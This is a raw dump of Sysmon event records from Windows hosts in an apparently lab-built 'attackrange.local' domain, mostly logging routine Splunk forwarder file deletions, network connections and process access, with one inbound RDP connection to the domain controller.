Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57378-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:08.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A68574E3F48C48EAC5CAC77A8E405D,SHA256=8F37480FFE418B42D616D45240E0C9ECE8F13B2923640AF8E0C5E6AA18A5752D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:59.400{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-58334-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000809156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:09.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86D0FD87599B13FC2BD00FD7C38D18AF,SHA256=45D30AE58752E4720D8CE95D00C70F2CDFC5D3EBE353871B3518B3949AB40309,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:10.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D52A8B11F24502B4F1739845DBB6C447,SHA256=B4616F294B6A06F32E35FA98727D4B13C367AEC6501D966FA07505864DE93984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:10.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=883A847F2020E9A13920BD697E4E0D7A,SHA256=F82BA3D9EC2FC7DB46832B87CD0821540072C73B6E38A3754E542072428AC5C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:11.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453350F77B79318395FF58315B2AD911,SHA256=76B3212E9AD230C7A6D9AA511BEB872426BE55D440790F35551238F50E3179DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:11.034{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B37A5627FC6DFD846ABD6A006BBB3C53,SHA256=F904694392856B8346A80A1C119BA0133075727BA084BE3D8B77FF32BEDC99CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:02.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51155-false10.0.1.12-8000- 23542300x80000000000000001052369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:12.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC43392F722B02F858856732EE72F173,SHA256=7688B82F4AB8A973B0D07762E772AB1B64F3F8998B84257B5BE1D05F5E6469D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:12.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505B5535B3769FC29BDB6FE5DB9E89B0,SHA256=C8CCB1C28DE642950CE22FB4C2FD7F15FD8CACF0880AEB4F8F7C38CA8183EAA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:13.073{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4107F3013CD5073E68BAEFAB1EB4D53A,SHA256=F5E18E2113EF02F078D851BEC3672564763AFD9E7EE916860444F5AFC9C8E317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:13.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E705B39AE5B51AF30E6CFFEAD0CCE48D,SHA256=D8C3D587FFE33C8C267386410A31EED45B7EB40035D3C12403E9AC62CABAFABB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:12.299{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57379-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:14.104{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007322E4984ADA966DCA54BF5AE653D8,SHA256=FED4DA3D32D8027D28A592DED8C30189D003F8D77C96898DFC528ADDEA4A69E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:14.087{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419A19EA6FC005AF47047AB0BB68E326,SHA256=4B66E0637BCE336679D734748B37D5BE051AC65A6A35F0C4FDE8EC26FF2B0EFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:15.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BCCC1D71A269398816DF9D14583883A,SHA256=5132C5D6B8857B1AE232915A34BDDFC57A87464703ED43EECE06F800D2860C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:15.503{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F176F4646537EA9567C66FFB4D512A1,SHA256=B9081DA03919A5C86ACE36CFEB6ED79E7FBAD9399A800788910383554A3ED560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:15.503{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E3932029088D60C0F2BCFE4D21E3414,SHA256=95927FF4000A25E695957380721033813649B78F05DF3AEC26CA3430154A96ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:15.088{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E6219F3F41CFAB480BBEC421645E16,SHA256=AC9D577271B6337948FC2266EE21B0F7277539C473370C277FE77655158ECF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:16.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=019BDF9B05C567A88FA1A0F8E7281EDD,SHA256=A2981EA8E526167887B3F0E1D7B993E1FA822236914FEB7F994B082E8ABB1E2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:08.015{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51157-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:08.015{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51157-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:07.769{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51156-false10.0.1.12-8000- 23542300x80000000000000001052376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:16.088{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E23BE37B52977C14D874443AE5BE486,SHA256=C1B4E8255C257FC3C55287C511CF178224A55C29B7257F8E7DB0CFE1BE9D5AE9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:17.089{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B29CFA0D155C286CFAC43E7AFA0C3BB6,SHA256=F95CE3364AB82A078AD5A14F11350998571462574857BF0C34C3955AEEFA9063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:17.156{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA5E058534E4A3253A3C38C357E3437B,SHA256=83C5FF254A88DCE72E8D11FFD6EB38B97B979B939C4CE51556A4220D8E99BE6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:18.405{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:18.104{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDE30819564ED221D6FBB77D9D9353B,SHA256=B4EE3F7FDB8C52316525985416A2E42060BCAEC8535A5C8E18017C96D5F6801F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:18.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADC62312910D016098BD85B52F1CC8D,SHA256=CCA1DB841B577F58EE7ACB397DA56818CEFF255091412A0C7F4A2B24FB90E6CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:19.203{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88EC54CE5F92D64AB239AA60F564BF10,SHA256=272CE4CD1496D4B8FC56B75D8004A3F15E0463D3861B101E89F00FD3CEE801FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:19.105{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1160E315D25B0146DC31E78DC51B06CE,SHA256=90BD43636FC85B37376F9BB1D90131A85F75CC51C718EF8B84739069BE0D879D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:20.719{0C1E0330-050B-60E8-9B00-00000000D001}1020NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:20.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFAEC5954E8CA13060C24A26503AB601,SHA256=E33D416B4D4BFFD5CAA83C44673BBED49E66937BAA4A84235E5174B80A48E2AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:20.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E570412EC7B41D4DF48CB3151DE2D10,SHA256=EE66D241D768B04F8F28F54577266972150FE38E218B858C535D205445CEE419,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:18.305{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57380-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:13.638{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51158-false10.0.1.12-8000- 23542300x80000000000000001052385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:21.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55CA6DEF8DF644D65AA4F4F1BF0F394E,SHA256=4A8D504EC3BB92B230D5056CA353EE8C6C4E65B0ECE266B6E2F0AE6AD6AD0C7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:21.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D8C7C4CED91DDA67D3A8DC88B5B64A1,SHA256=23C3EDFF1FF9135042459D8EB14709EE1B44CC16526B4807119548A8276E91F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:22.203{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B82845A8ED7CEA7AEDBCF1CF620E9F7B,SHA256=C354931270E32FE225A1FF0C9E5F3A0FCF3F1F219F337BC8B3D0BF220BEE77DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:22.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C378526C12220E6DF3057A1D237705,SHA256=E22F968F5CAE2D28AFEBC8FA954A4D5484DD1685D9E28E39EA80AA10622981CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:20.852{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57381-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000809174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:23.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA1023A452E898ACFCE3B19C6A7BA10A,SHA256=CD54962E19B6954C033569B1100CB614D9180F0DAC464D8E0331E22F7AC36DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:23.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=797AC98F51B72D08F974D2CD0A5D5F96,SHA256=92FEF20E646C6BA232E41C4A721E303F0CC967EEE36161FB72ED0F0AF98AD5BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.375{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 